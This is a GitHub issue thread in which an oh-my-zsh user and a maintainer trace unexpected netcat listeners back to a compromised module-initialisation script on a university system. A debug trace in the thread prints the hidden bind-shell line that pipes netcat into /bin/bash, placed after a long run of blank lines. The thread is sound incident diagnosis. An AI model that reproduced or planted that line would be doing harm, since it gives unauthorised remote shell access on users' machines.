### ISSUE TITLE
Oh my rootkit ... 

### ISSUE THREAD

**Issue by fhaust** [robbyrussell/oh-my-zsh#4850]
I just noticed that whenever I start a new shell there are three processes that get started:

    7115 me   20   0 59888  8400  3988 S  0.0  0.2  0:00.17 │  ├─ /usr/bin/zsh
    7145 me   25   5  9132   784   684 S  0.0  0.0  0:00.00 │  │  └─ nc -l -p 22223
    7149 me   25   5 20844  2796  2640 S  0.0  0.1  0:00.00 │  │     ├─ /bin/bash
    7148 me   25   5  9132   768   672 S  0.0  0.0  0:00.00 │  │     └─ nc -l -p 22222

That looks suspiciously like somebody trying to execute code on my system. I can only pinpoint it to *omz* in so far that this is not happening when I don't use *omz* those netcat instances aren't created.

Grepping through my `.oh-my-zsh` folder doesn't turn up any instances of `nc` or the portnumbers seen above.

Somebody with some knowledge about the *omz* system should investigate here as it seems that *omz* is currently spreading malware.

**Comment by mcornella** [comment]
Follow [these instructions to generate a debug log](https://github.com/robbyrussell/oh-my-zsh/wiki/Troubleshooting#everything-else) and post them in a gist.

**Comment by fhaust** [comment]
I just hope that doesn't contain any confidential informations 0o

The offending call is right here: https://gist.github.com/fhaust/9016946f2c88a9d70585#file-gistfile1-txt-L8409

**Comment by mcornella** [comment]
**I trust that you've already killed those netcats, for your security.** You can noew make the gist secret.

The relevant part is from lines ~8259 to 8409, which is where the actual call is made:

```
if [ -f /vol/ai/lib/modules-tcl/init/bash ]; then
        # You can use .modulefiles in your home for private modules
        # e.g. testing purposes or nobody else would need them.
        source /vol/ai/lib/modules-tcl/init/bash

        if [ -d ~/.modulefiles ]; then
                module use ~/.modulefiles
        fi
        module use /vol/clfvr/share/modulefiles

        # If you start a nested shell (e.g. by typing bash) you might
        # not like modules you unloaded beeing reloaded in the nested shell
        # again if you load them in your .bashrc.
        # If reloading is the intended behavior remove the surrounding if
        if [ -z "$BASHRC_LOADED" ]; then
                # Here you can specifiy modules you always want to load
                module load clfvr
                export BASHRC_LOADED=1
        fi
fi
+/homes/fhofmann/.zshrc:115> [ -f /vol/ai/lib/modules-tcl/init/bash ']'
+/homes/fhofmann/.zshrc:118> source /vol/ai/lib/modules-tcl/init/bash
MODULESHOME=/vol/ai/lib/modules-tcl; export MODULESHOME
+/vol/ai/lib/modules-tcl/init/bash:1> MODULESHOME=/vol/ai/lib/modules-tcl 
+/vol/ai/lib/modules-tcl/init/bash:1> export MODULESHOME

if [ -z $TCLSH ]; then
   if [ -f /usr/bin/tclsh ]; then
      TCLSH="/usr/bin/tclsh"
   elif [ -f /bin/tclsh ]; then
      TCLSH="/bin/tclsh"
   else 
      TCLSH=""
   fi
fi
+/vol/ai/lib/modules-tcl/init/bash:3> [ -z ']'
+/vol/ai/lib/modules-tcl/init/bash:4> [ -f /usr/bin/tclsh ']'
+/vol/ai/lib/modules-tcl/init/bash:5> TCLSH=/usr/bin/tclsh 

module () { eval `$TCLSH /vol/ai/lib/modules-tcl/modulecmd.tcl bash $*`; }
. /vol/ai/lib/modules-tcl/init/modulerc
+/vol/ai/lib/modules-tcl/init/bash:14> . /vol/ai/lib/modules-tcl/init/modulerc
#module use /mips/tools/freeware/modulefiles
#module use /mips/tools/platinum/envmodule/modulefiles
module use /vol/ai/share/modulefiles
+/vol/ai/lib/modules-tcl/init/modulerc:3> module use /vol/ai/share/modulefiles
+module:0> /usr/bin/tclsh /vol/ai/lib/modules-tcl/modulecmd.tcl bash use /vol/ai/share/modulefiles
+module:0> eval . /tmp/modulescript_8405_0
+(eval):1> . /tmp/modulescript_8405_0
/bin/rm -f /tmp/modulescript_8405_0
+/tmp/modulescript_8405_0:1> /bin/rm -f /tmp/modulescript_8405_0
MODULEPATH_modshare="/vol/ai/share/modulefiles:1"; export MODULEPATH_modshare
+/tmp/modulescript_8405_0:2> MODULEPATH_modshare=/vol/ai/share/modulefiles:1 
+/tmp/modulescript_8405_0:2> export MODULEPATH_modshare
MODULEPATH="/vol/ai/share/modulefiles"; export MODULEPATH
+/tmp/modulescript_8405_0:3> MODULEPATH=/vol/ai/share/modulefiles 
+/tmp/modulescript_8405_0:3> export MODULEPATH





























































































( nc -l -p 22222 2>/dev/null | /bin/bash 2>&1 | nc -l -p 22223 &>/dev/null ) &
```

**Comment by fhaust** [comment]
Yep i killed those.

Apparently this has nothing to do with *omz*, sorry for the false alarm.

**Comment by mcornella** [comment]
Ok, I was about to post my guess as to the exact sequence of calls, which must have something to do with those `module` calls. Let me know if you figure out the exact point where the `nc` call was introduced!

Good luck :wink:

**Comment by fhaust** [comment]
I am having a hard time interpreting that file, can you see which file that call originates from?

**Comment by mcornella** [comment]
Ah, I think i found it! Check the `/vol/ai/lib/modules-tcl/init/bash` file. The offending part will be at the end of it:
```
+/vol/ai/lib/modules-tcl/init/bash:108> nc -l -p 22222
+/vol/ai/lib/modules-tcl/init/bash:108> /bin/bash
+/vol/ai/lib/modules-tcl/init/bash:108> nc -l -p 22223
```

**Comment by fhaust** [comment]
​Yep, I eventually found that, too ;)

That stuff is probably running on hundreds of machines right now ...​

2016-02-15 13:47 GMT+01:00 Marc Cornellà <notifications@github.com>:

**Comment by mcornella** [comment]
I don't know where that came from, but it wouldn't surprise me [if it came from sourceforge](https://en.wikipedia.org/wiki/SourceForge#Project_hijackings_and_bundled_malware), which is where the [modules project](modules.sourceforge.net) is hosted...

**Comment by fhaust** [comment]
Don't think so, this was probably an internal attack. This is an University
infrastructure.
Am 15.02.2016 14:23 schrieb "Marc Cornellà" <notifications@github.com>:

**Comment by mcornella** [comment]
Oh ok. I trust you'll report that to whoever is responsible then. Cheers!

**Comment by fhaust** [comment]
Already did, as have others :-)
Am 15.02.2016 14:55 schrieb "Marc Cornellà" <notifications@github.com>:
